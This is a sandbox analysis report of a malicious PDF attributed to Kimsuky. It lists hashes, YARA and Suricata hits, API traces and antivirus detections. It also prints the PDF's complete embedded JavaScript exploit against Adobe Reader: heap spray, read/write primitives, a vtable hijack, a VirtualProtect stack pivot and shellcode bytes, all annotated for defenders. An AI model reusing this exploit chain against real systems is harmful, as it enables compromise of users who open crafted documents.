Summary | ZeroBOX

2.pdf

Kimsuky Javascript ShellCode PDF
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 9, 2021, 9:59 p.m. Aug. 9, 2021, 10:01 p.m.
Size 685.9KB
Type PDF document, version 2.0
MD5 de2a8a728f81d44562bfd3e91c95f002
SHA256 7900ca98a6fbed74aa5a393758c43ad7abc9d8c73c3fbab7af93bae681065f4e
CRC32 1BA377DA
ssdeep 12288:e9wwBpdbie7g84OTKuBqOX1BNVT5m+YH+JARGEwuxkIOcaj/5vDTWjaOyGj:Xkdz7y2DBJ1dYHoARzTkjcwvDTWOO
Yara
  • PDF_Javascript_ShellCode - PDF Javascript ShellCode
  • APT_Kimsuky_PDF_Shellcode_Aug_2021_1 - Detect Kimsuky shellcode used in fake PDF against South Korea
  • PDF_Format_Z - PDF Format

IP Address Status Action
164.124.101.2 Active Moloch (no TLS session, Suricata alert or HTTP request on this page is attributed to this host; treat it as unexplained and check the pcap before reading it as a callback)
23.212.12.57 Active Moloch (serves a *.adobe.com certificate, see Suricata TLS below; consistent with Reader's own armmf.adobe.com manifest requests rather than with anything the document does)

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 23.212.12.57:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) (category: undefined). Analyst note: this is the same flow whose server certificate is issued to *.adobe.com (Suricata TLS below), and the only HTTP requests recorded are Reader's ARM manifest fetches from armmf.adobe.com. A JA3 hit fingerprints the client TLS stack, not the destination, so this alert is most likely a false positive on Reader's update check; no command-and-control traffic attributable to the document is recorded on this page.

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49165
23.212.12.57:443
C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA C=US, ST=California, L=San Jose, O=Adobe Inc, CN=*.adobe.com 34:65:16:66:1c:13:4a:0f:09:e2:e7:a8:54:c8:fc:ad:48:e8:ce:89

Attached file aaaaa
// Javascript code (the PDF's embedded script as dumped by the sandbox; reflowed for
// readability with analyst comments added -- every code token is unchanged).
//
// Analyst summary (based only on what the script below does; the underlying Reader
// bug is not identified on this page):
//   1. top level: spray ~768 MB of ArrayBuffer(0xffe8), each tagged "ABBA" (0x41424241)
//      with 0xffffff81 at +4 and a fake object image at +0x2FD8; stage the shellcode
//      in shellbuf; arm a() after 3.5 s.
//   2. a(): create/remove 0x80 fields, spray and free 0x300 strings around
//      this.dataObjects[0], null it, arm b() after 10 s.
//   3. b(): treat this.dataObjects[0] as an indexable view over memory (fake_arr),
//      locate the buffer whose byteLength went negative (jj), build a read primitive
//      (kk) and a write primitive (dd), walk to a module base (ii), find a 0x94 0xC3
//      gadget (xchg eax,esp; ret) in its .text (ff) and the kernel32!VirtualProtect
//      IAT entry (ee), clone a vtable into base_mem+0x8000 with slot 9 replaced by the
//      gadget and a VirtualProtect(shellcode, 0x1000, 0x40, ...) frame at its head,
//      swap the vtable pointer (dd) and trigger the virtual call via a.saveXML('pretty').
// Detection hooks: the "ABBA"/0xffffff81 tag pair, the 0x3030xxxx fake pointers, the
// literal "kernel32.dll"/"VirtualProtect" byte arrays, and the 0x1000 / 0x40
// VirtualProtect arguments that match the sandbox's NtProtectVirtualMemory entry.

var mem_arr = new Array(0x3000);   // main spray: 0x3000 x ArrayBuffer(0xffe8), filled at the bottom
var mem_arr1 = new Array(0x1000);  // small spray: 0x1000 x ArrayBuffer(0x100)
var fill_heap = new Array(0x5000); // string spray performed in b()
var buf_arr = new Array(0x300);    // string spray performed and freed in a()
var dvshellbuf;                    // re-declared near the bottom as the Uint32Array holding the shellcode
var fake_arr;                      // this.dataObjects[0], indexed by b() as if it were an array of dwords
var base_mem = 0;                  // the sprayed ArrayBuffer whose byteLength reads as negative (set in jj)
var base_addr = 0;                 // address the script assumes base_mem's data starts at (set in b)
var viewer = 0;                    // Uint32Array window into mem_arr[fakeIdx - 1] at +0x37D8 (set in jj)
var AcroForm_Base = 0;             // image base of the module located by ii()
var myfieldaddress;                // Field object returned by this.addField in b()
var dllName = new Uint8Array([0x6B, 0x65, 0x72, 0x6E, 0x65, 0x6C, 0x33, 0x32, 0x2E, 0x64, 0x6C, 0x6C, 0]);           // "kernel32.dll\0"
var funcName = new Uint8Array([0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x50, 0x72, 0x6F, 0x74, 0x65, 0x63, 0x74, 0]); // "VirtualProtect\0"
var beforevftable;                 // address of a presumed vtable pointer, saved by ii()
var addr, xaddr;                   // pointer-chain cursors used by ii() and c() (and read again in b)
var read_array;                    // Uint32Array whose backing pointer kk()/dd() temporarily redirect
var fakeIdx = 1;                   // index in mem_arr of the corrupted buffer (set in jj)
var field_arr = new Array(0x100);  // Field objects created and removed by a()

// Arbitrary 32-bit read.  The dword at +0x50 of the object at viewer[2] is treated as
// read_array's backing-store pointer: it is saved, pointed at `addr`, read through
// read_array[0], then written back.  NOTE: `old` is assembled big-endian (byte at
// +0x50 ends up most significant) but restored with a little-endian setUint32, so the
// restored dword is byte-reversed relative to what was there.
function kk(addr) {
  var arbAddr = viewer[2] - base_addr;
  var memView = new DataView(base_mem);
  var old = memView.getUint8(arbAddr + 0x50);
  old = (old << 8) + memView.getUint8(arbAddr + 0x51);
  old = (old << 8) + memView.getUint8(arbAddr + 0x52);
  old = (old << 8) + memView.getUint8(arbAddr + 0x53);
  memView.setUint32(arbAddr + 0x50, addr, true);
  var ret = read_array[0];
  memView.setUint32(arbAddr + 0x50, old, true);
  return ret;
}

// Find the sprayed buffer whose byteLength field was overwritten (every buffer stores
// 0xffffff81 at +4, presumably so that a buffer whose header overlaps another buffer's
// data reports a negative length).  base_mem becomes that buffer; viewer is a dword
// window into the *previous* buffer at +0x37D8 (= 0x2FD8 + 0x800, the end of the fake
// object image written at spray time).  arb_Addr and field_Addr are computed but unused.
function jj() {
  for (var i = 0; i < 0x3000; i++) {
    if (mem_arr[i].byteLength < 0) {
      fakeIdx = i;
      break;
    }
  }
  base_mem = mem_arr[fakeIdx];
  viewer = new Uint32Array(mem_arr[fakeIdx - 1], 0x37D8, 0x20);
  var arb_Addr = viewer[2];
  var field_Addr = viewer[0];
}

// Locate a module base.  Starts from base_addr + 0x8 (fake_arr[i + 1], the Field object
// stored by b), follows a fixed pointer chain to what is treated as a vtable pointer,
// backs off 0x60000, page-aligns, and scans downward one page at a time until the
// dword reads 0x905A4D (bytes 4D 5A 90 00, an "MZ" DOS header).
function ii() {
  addr = kk(base_addr + 0x8);
  addr = kk(addr + 0x10);
  addr = kk(addr + 0x10);
  addr = kk(addr + 0x0C);
  beforevftable = kk(addr + 4);
  addr = kk(beforevftable);
  AcroForm_Base = (addr - 0x60000) & 0xFFFFF000;
  while (kk(AcroForm_Base) != 0x905A4D) {
    AcroForm_Base -= 0x1000;
  }
}

// Copy the first 8 dwords of the object at base_addr + 0x10 (fake_arr[i + 2], the
// "abname" data object) into the start of mem_arr[fakeIdx - 1]; b() later writes
// these 8 dwords over the fake object image at +0x2FD8.  `i` has no `var` here, so it
// is an implicit global.
function hh() {
  var addesobject = kk(base_addr + 0x10);
  var dv = new DataView(mem_arr[fakeIdx - 1]);
  for (i = 0; i < 8; i++) {
    dv.setUint32(4 * i, kk(addesobject + i * 4), true);
  }
}

// Parse the PE headers of the module at AcroForm_Base through the read primitive.
// Offsets used are consistent with PE32: e_lfanew at +0x3C, "PE\0\0" (0x4550),
// SizeOfOptionalHeader at NT+0x14, first section header at NT+0x18+SizeOfOptionalHeader,
// 0x28-byte section headers whose name is compared against ".tex" (0x7865742E),
// VirtualAddress at +0x0C / SizeOfRawData at +0x10, and the import data directory
// (second entry) at NT+0x18+0x60+8.
// Returns [textVA, textSize, importDirVA, importDirSize], or 0 on any mismatch.
function gg() {
  var e_lfanew = kk(AcroForm_Base + 0x3C);
  var imgNtHdr = AcroForm_Base + e_lfanew;
  if (kk(imgNtHdr) != 0x4550) {
    return 0;
  }
  var sizeofOptionalHdr = kk(imgNtHdr + 0x14) & 0xFFFF;
  var sectionHdr = imgNtHdr + sizeofOptionalHdr + 0x18;
  while (kk(sectionHdr) != 0x7865742E) {
    sectionHdr += 0x28;
    if (kk(sectionHdr + 0xC) == 0) { // VirtualAddress of 0 is used as the end-of-table sentinel
      return 0;
    }
  }
  var retArray = new Array(4);
  retArray[0] = AcroForm_Base + kk(sectionHdr + 0x0C);
  retArray[1] = kk(sectionHdr + 0x10);
  var dataDir = imgNtHdr + 0x18 + 0x60;
  retArray[2] = AcroForm_Base + kk(dataDir + 8);
  retArray[3] = kk(dataDir + 0x0C);
  return retArray;
}

// Byte-pattern search for `target` in [addr, addr + size), performed through a
// Uint8Array over base_mem at offset addr - base_addr (i.e. the oversized buffer is
// used as a window onto absolute addresses).  Returns the absolute address of the
// first match, or 0.  `alertnum` is never read -- a leftover from debugging.
function ff(addr, size, target) {
  var viewText = new Uint8Array(base_mem, addr - base_addr, size);
  var alertnum = 0;
  for (var i = 0; i < size - target.length; i++) {
    var breaked = false;
    for (var j = 0; j < target.length; j++) {
      var v = viewText[i + j];
      if (alertnum < 3) {
        alertnum++;
      }
      if (v != target[j]) {
        breaked = true;
        break;
      }
    }
    if (!breaked) {
      return i + addr;
    }
  }
  return 0;
}

// Resolve an imported function through the module's import table.  Walks 0x14-byte
// import descriptors (Name at +0x0C, FirstThunk at +0x10, OriginalFirstThunk at +0)
// until the DLL name matches `dllName`; a byte matches if it equals the expected byte
// or the expected byte minus 0x20 (so an upper-case "KERNEL32.dll" is accepted).  It
// then walks the name thunks, skipping the 2-byte hint, until `funcName` matches, and
// returns the resolved address stored in the parallel IAT slot.  Returns 0 if the DLL
// is not found.  NOTE: the inner `while (funcNameAddr != 0)` never sees 0 because
// AcroForm_Base is added before the test, and ordinal imports are not handled; the
// loop relies on a name match occurring before it runs off the thunk array.
function ee(iatAddr, iatSize, dllName, funcName) {
  var dirAddr = iatAddr;
  var bFind = false;
  while (kk(dirAddr + 0x10) != 0) {
    var dllNameAddr = kk(dirAddr + 0x0C) + AcroForm_Base;
    var idx = 0;
    var breaked = false;
    var a = kk(dllNameAddr) & 0xFF;
    while (a != 0) {
      if (a != dllName[idx] && a + 0x20 != dllName[idx]) {
        breaked = true;
        break;
      }
      idx++;
      dllNameAddr++;
      if (idx > dllName.length) {
        breaked = true;
        break;
      }
      a = kk(dllNameAddr) & 0xFF;
    }
    if (!breaked) {
      bFind = true;
      break;
    }
    dirAddr += 0x14;
  }
  if (!bFind) {
    return 0;
  }
  var iatNames = kk(dirAddr) + AcroForm_Base;
  var iatAddrs = kk(dirAddr + 0x10) + AcroForm_Base;
  var funcNameAddr = kk(iatNames) + AcroForm_Base;
  while (funcNameAddr != 0) {
    funcNameAddr += 2;
    var a = kk(funcNameAddr) & 0xFF;
    var idx = 0;
    var breaked = false;
    while (a != 0) {
      if (a != funcName[idx]) {
        breaked = true;
        break;
      }
      idx++;
      if (idx > funcName.length) {
        breaked = true;
        break;
      }
      funcNameAddr++;
      a = kk(funcNameAddr) & 0xFF;
    }
    if (!breaked) {
      return kk(iatAddrs);
    }
    iatNames += 4;
    iatAddrs += 4;
    funcNameAddr = kk(iatNames) + AcroForm_Base;
  }
  return 0;
}

// Arbitrary 32-bit write, mirror image of kk(): redirect read_array's backing pointer
// to xaddr, store base_addr + 0x8000 (the address the script assumes for the cloned
// vtable built in b) through read_array[0], then restore the pointer.  Same
// big-endian-read / little-endian-restore asymmetry as kk().
function dd() {
  var arbAddr = viewer[2] - base_addr;
  var memView = new DataView(base_mem);
  var old = memView.getUint8(arbAddr + 0x50);
  old = (old << 8) + memView.getUint8(arbAddr + 0x51);
  old = (old << 8) + memView.getUint8(arbAddr + 0x52);
  old = (old << 8) + memView.getUint8(arbAddr + 0x53);
  memView.setUint32(arbAddr + 0x50, xaddr, true);
  read_array[0] = base_addr + 0x8000;
  memView.setUint32(arbAddr + 0x50, old, true);
}

var xfuncaddr; // first dword of the object at xaddr (treated as its vtable pointer)

// Walk from base_addr + 0x20 (fake_arr[i + 4], the XPath result `a`) through a fixed
// pointer chain to the object whose virtual call a.saveXML() will go through; xaddr is
// that object's address and xfuncaddr its first dword.  If the dword at +0x34 is
// non-zero the chain takes one more hop through it.
function c() {
  xaddr = kk(base_addr + 0x20);
  xaddr = kk(xaddr + 0x10);
  xaddr = kk(xaddr + 0x10);
  xaddr = kk(xaddr + 0x4);
  xaddr = kk(xaddr + 0x4);
  if (kk(xaddr + 0x34) == 0) {
    xfuncaddr = kk(xaddr);
  } else {
    xaddr = kk(xaddr + 0x34);
    xfuncaddr = kk(xaddr);
  }
}

// Second stage (armed by a()).  Sprays 0x5000 copies of a "PP  0000..." string,
// builds a small XML document and XPath result, then scans this.dataObjects[0] for the
// "ABBA" tag and plants JS objects next to it so their addresses can be read back
// through kk().  If the tag is found it runs the primitive/PE/gadget setup, clones
// 0x300 dwords of the real vtable into base_mem+0x8000, patches slot 9 with the
// 0x94 0xC3 gadget, lays out a VirtualProtect frame at the head of the clone, swaps the
// vtable pointer with dd(), and triggers the virtual call with a.saveXML('pretty').
// `frontvftable` is computed but unused; `k` in the trailing loop is an implicit global;
// `a` here is a local shadowing the function a() below; `shellbuf` is the hoisted
// top-level var assigned at the bottom of the file.
function b() {
  for (var i = 0; i < 0x5000; i++) {
    fill_heap[i] = unescape("%u5050%u2020%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030");
  }
  // The "\ " sequences are remnants of backslash line continuations collapsed by the dump.
  var cXMLDoc = "<family name = 'Robat'>\ <mom id = 'm3' name = 'Mary' gender='F'>\ <spouse> m2 </spouse>\ <personal>\ <income>25000</income>\ </personal>\ </mom>\ </family>";
  var myXML = XMLData.parse(cXMLDoc, false);
  var a = XMLData.applyXPath(myXML, "//family/mom");
  fake_arr = this.dataObjects[0];
  this.createDataObject("abname", "qwer");
  var bChged = false;
  for (var i = 1; i < 0x10000; i++) {
    if (fake_arr[i] == 0x41424241) { // "ABBA" tag written by the spray
      fake_arr[i - 2] = 0;
      myfieldaddress = this.addField("FieldField", "text", 0, [0, 0, 10, 10]);
      fake_arr[i + 1] = myfieldaddress;              // read back at base_addr + 0x08 (ii)
      fake_arr[i + 2] = this.getDataObject("abname"); // read back at base_addr + 0x10 (hh)
      fake_arr[i + 3] = shellbuf;                     // read back at base_addr + 0x18 (shellcode address)
      fake_arr[i + 4] = a;                            // read back at base_addr + 0x20 (c)
      base_addr = 0x30303830 + i * 8;                 // assumes 8-byte slots at the address sprayed at +0x2FD8+0xC
      bChged = true;
      var temp = new Array(0x1000);
      for (var j = 0x1000; j >= 0; j--) {
        temp[j] = new Array(0x100);
      }
      for (var j = i - 0x10; j >= 2; j--) {
        fake_arr[j] = new ArrayBuffer(0x1000);
      }
      read_array = new Uint32Array(0x100);
      fake_arr[1] = read_array;
      break;
    }
  }
  if (bChged) {
    jj();
    ii();
    hh();
    c();
    var textRVA = gg();
    var opCodes = new Uint8Array([0x94, 0xC3]); // xchg eax, esp ; ret
    var opCodeAddr = ff(textRVA[0], textRVA[1], opCodes);
    var funcAddr = ee(textRVA[2], textRVA[3], dllName, funcName);
    var frontvftable = kk(addr - 4);
    var shellcdeaddr = kk(base_addr + 0x18);
    shellcdeaddr = kk(shellcdeaddr + 0xc); // dword at +0xC of the shellbuf object, used as its data address
    var expArrbuf = new DataView(base_mem, 0x8000, 0x1100);
    for (i = 0; i < 0x300; i++) {
      expArrbuf.setUint32(i * 4, kk(xfuncaddr + i * 4), true); // clone the original vtable
    }
    expArrbuf.setUint32(9 * 4, opCodeAddr, true); // slot 9 -> stack-pivot gadget
    // Dwords 0..5 double as the stack after the pivot: VirtualProtect address,
    // return address = shellcode, then (lpAddress, dwSize=0x1000, flNewProtect=0x40,
    // lpflOldProtect) -- matching the sandbox's NtProtectVirtualMemory 4096 / 0x40 entry.
    expArrbuf.setUint32(0, funcAddr, true);
    expArrbuf.setUint32(4, shellcdeaddr, true);
    expArrbuf.setUint32(0x8, shellcdeaddr, true);
    expArrbuf.setUint32(0xC, 0x1000, true);
    expArrbuf.setUint32(0x10, 0x40, true);
    expArrbuf.setUint32(0x14, 0x30303020, true);
    expArrbuf.setUint32(0x1000, xaddr, true);
    expArrbuf.setUint32(0x1004, xfuncaddr, true);
    dd();
    a.saveXML('pretty'); // virtual call through the swapped vtable
  }
  // Write the 8 dwords captured by hh() over the fake object image at +0x2FD8
  // ((3062 + k) * 4 == 0x2FD8 + k * 4); reads them little-endian, writes little-endian.
  var dv2 = new DataView(mem_arr[fakeIdx - 1]);
  for (k = 0; k < 8; k++) {
    var old = dv2.getUint8(k * 4 + 3);
    old = (old << 8) + dv2.getUint8(k * 4 + 2);
    old = (old << 8) + dv2.getUint8(k * 4 + 1);
    old = (old << 8) + dv2.getUint8(k * 4);
    dv2.setUint32((3062 + k) * 4, old, true);
  }
}

// First stage (armed at load).  Creates and removes 0x80 text fields, sprays 0x300
// strings (touching this.dataObjects[0].toString() when i == 0x250), frees the strings,
// nulls this.dataObjects[0], and schedules b() 10 s later.  Consistent with heap
// grooming around the data object that b() then indexes as fake_arr; the exact bug is
// not shown here.  `g_timeout` is an implicit global.
function a() {
  for (var i = 0; i < 0x80; i++) {
    field_arr[i] = this.addField("Field_" + i, "text", 0, [0, 800, 55, 850]);
  }
  for (var i = 0; i < 0x80; i++) {
    this.removeField("Field_" + i);
  }
  for (var i = 0; i < 0x300; i++) {
    buf_arr[i] = unescape("%u9584%u9584%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9648%u9648%u9648");
    if (i == 0x250) this.dataObjects[0].toString();
  }
  for (var i = 0; i < 0x300; i++) {
    delete buf_arr[i];
    buf_arr[i] = null;
  }
  this.dataObjects[0] = null;
  g_timeout = app.setTimeOut("b();", 10000);
}

// Small spray: 0x1000 buffers of 0x100 bytes, each tagged "ABBA" with 0xffffff81 at +4.
for (var i = 0; i < 0x1000; i++) {
  mem_arr1[i] = new ArrayBuffer(0x100);
  var dv1 = new DataView(mem_arr1[i]);
  dv1.setUint32(0, 0x41424241, true);
  dv1.setUint32(4, 0xffffff81, true);
}

// Main spray: 0x3000 buffers of 0xffe8 bytes (~768 MB; the sandbox's "heapspray" entry
// counts 12,275 x 65,536-byte PAGE_READWRITE allocations).  Each buffer gets the tag
// pair at +0 / +4 and, at +0x2FD8, a fake object image whose pointer fields assume the
// buffer data lands at 0x30303000-ish (0x30303060, 0x30303100, 0x30303830, ...).  The
// write at +0x1E9 is unaligned.  The three dwords at +0x37D8 - 0xC..-0x4 are what
// viewer (jj) looks at.
for (var i = 0; i < 0x3000; i++) {
  mem_arr[i] = new ArrayBuffer(0xffe8);
  var dv = new DataView(mem_arr[i]);
  dv.setUint32(0, 0x41424241, true);
  dv.setUint32(4, 0xffffff81, true);
  dv.setUint32(0x2FD8, 0x30303060, true);
  dv.setUint32(0x2FD8 + 4, 0x30303100, true);
  dv.setUint32(0x2FD8 + 0xC, 0x30303830, true);
  dv.setUint32(0x2FD8 + 0x24, 0x10000, true);
  dv.setUint32(0x2FD8 + 0x30, 0x30303090, true);
  dv.setUint32(0x2FD8 + 0x60, 0x303030C0, true);
  dv.setUint32(0x2FD8 + 0x6C, 0x30303200, true);
  dv.setUint32(0x2FD8 + 0x70, 0x1000, true);
  dv.setUint32(0x2FD8 + 0x1E9, 1, true);
  dv.setUint32(0x2FD8 + 0xD0, 0x30303130, true);
  dv.setUint32(0x2FD8 + 0x800 - 0xC, 0x10000, true);
  dv.setUint32(0x2FD8 + 0x800 - 0x8, 8, true);
  dv.setUint32(0x2FD8 + 0x800 - 0x4, 0x10000, true);
}

// Shellcode staging: 72 little-endian dwords (288 bytes) copied into a 0x25000-byte
// buffer whose address b() later hands to VirtualProtect.  Decoding the dwords as x86:
// it opens with pushad/push ebp/mov ebp,esp (60 55 8B EC); dwords 12-14 spell the ASCII
// string "calc.exe"; dwords 49-52 are xor eax,eax / mov eax,fs:[0x30] (PEB access) and
// dword 24 contains ror edi,0xD (C1 CF 0D), i.e. an export-table hash resolver; dword 63
// pushes 0x0E8AFE98, which matches the ROR-13 hash commonly listed for WinExec.  The
// payload therefore appears to be a WinExec("calc.exe") test stub -- note that the
// sandbox's process list shows no calc.exe child, so execution is not demonstrated here.
var shellbuf = new ArrayBuffer(0x25000);
var dvshell = new DataView(shellbuf);
var dvshellbuf = new Uint32Array([
  0xEC8B5560, 0x000017E8, 0x8B615D00, 0x0CE883C5, 0x9058B894, 0x088B3031, 0x8904408B, 0x2460FF01,
  0x83EC8B55, 0x565310EC, 0xEB5DEB57, 0x6C61635B, 0x78652E63, 0x55600065, 0x2C246C8B, 0x8B3C458B,
  0x03780554, 0x184A8BD5, 0x03205A8B, 0x348B49DD, 0x33F5038B, 0xFCC033FF, 0x74C084AC, 0x0DCFC107,
  0xF4EBF803, 0x28247C3B, 0x5A8BE375, 0x66DD0324, 0x8B4B0C8B, 0xDD031C5A, 0x038B048B, 0x45895DC5,
  0x458B61F4, 0x0008C2F4, 0x81EC8B55, 0x001000EC, 0x0000E800, 0x835F0000, 0x06EB38C7, 0x05EA835A,
  0xF5E805EB, 0x8DFFFFFF, 0xAB10F905, 0x89D02B00, 0x058DF855, 0x00AB108D, 0x89F84503, 0xC933F045,
  0xA164C033, 0x00000030, 0x8B0C408B, 0x368B1C70, 0x8B08568B, 0x3966207E, 0xF275184F, 0x746B3F80,
  0x4B3F8007, 0xE6EB0274, 0x330C7F80, 0x5589E075, 0xFC5D8BFC, 0x53FC5D8B, 0x8AFE9868, 0xF055FF0E,
  0x1084058D, 0x450300AB, 0x50006AF8, 0x81F455FF, 0x001000C4, 0x5E5F5D00, 0x5DE58B5B, 0x909090C3
]);
for (var i = 0; i < dvshellbuf.length; i++) {
  dvshell.setUint32(i * 4, dvshellbuf[i], true);
}
g_timeout = app.setTimeOut("a();", 3500); // kicks off stage a() 3.5 s after the document opens
request HEAD https://armmf.adobe.com/arm-manifests/win/ReaderDCManifest3.msi
request GET https://armmf.adobe.com/arm-manifests/win/ReaderDCManifest3.msi
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory — a single call setting 4096 (0x1000) bytes to PAGE_EXECUTE_READWRITE (0x40). These are exactly the dwSize (0x1000) and flNewProtect (0x40) values the embedded script places in its VirtualProtect frame, so this entry is most likely the exploit's protect of the shellcode page rather than a benign Reader call; the sandbox reports no stack pivot or DEP-bypass heuristic for it.

process_identifier: 2224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f343000
process_handle: 0xffffffff
1 0 0
cmdline "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043
parent_process acrord32.exe martian_process "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043. Analyst note: RdrCEF.exe lives under Reader's own AcroCEF directory and is spawned by AcroRd32.exe as part of normal Reader startup; the "martian" flag only means the sandbox did not expect it. No calc.exe, cmd.exe or other payload child is listed, so this page does not show the shellcode (which embeds the string "calc.exe") actually running — the run may have stopped at the RWX page change above.
Lionic Trojan.PDF.Agent.b!c
ALYac Trojan.PDF.208091A
Arcabit Trojan.Generic.D2C923C7
Cyren PDF/Trojan.AFWQ-0
ESET-NOD32 PDF/Exploit.Pidief.AAZ
TrendMicro-HouseCall TROJ_FRS.0NA104H621
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan-Dropper.PDF.Agent.gen
BitDefender Trojan.GenericKD.46736327
ViRobot Trojan.Win32.S.FakePDF.702372
MicroWorld-eScan Trojan.GenericKD.46736327
Ad-Aware Trojan.GenericKD.46736327
Comodo Malware@#1nnwapqfqw1d0
TrendMicro TROJ_FRS.0NA104H621
McAfee-GW-Edition Artemis!Trojan
FireEye Trojan.GenericKD.46736327
Emsisoft Trojan.GenericKD.46736327 (B)
Ikarus Exploit.Pidief
ZoneAlarm HEUR:Trojan-Dropper.PDF.Agent.gen
GData Trojan.GenericKD.46736327
AhnLab-V3 Exploit/PDF.FakeDocu
McAfee Artemis!DE2A8A728F81
Fortinet JS/Agent.5F4E!tr
AVG Other:Malware-gen [Trj]
Qihoo-360 susp.pdf.jsexp.gen
heapspray signature: count 12275, process AcroRd32.exe, total_mb 767, length 65536, protection PAGE_READWRITE — 12,275 allocations of 64 KiB (~767 MB) in the Reader process, consistent with the script's 0x3000 (12,288) x ArrayBuffer(0xffe8) spray. The spray itself is read/write only; the single executable page is created later by the NtProtectVirtualMemory call above.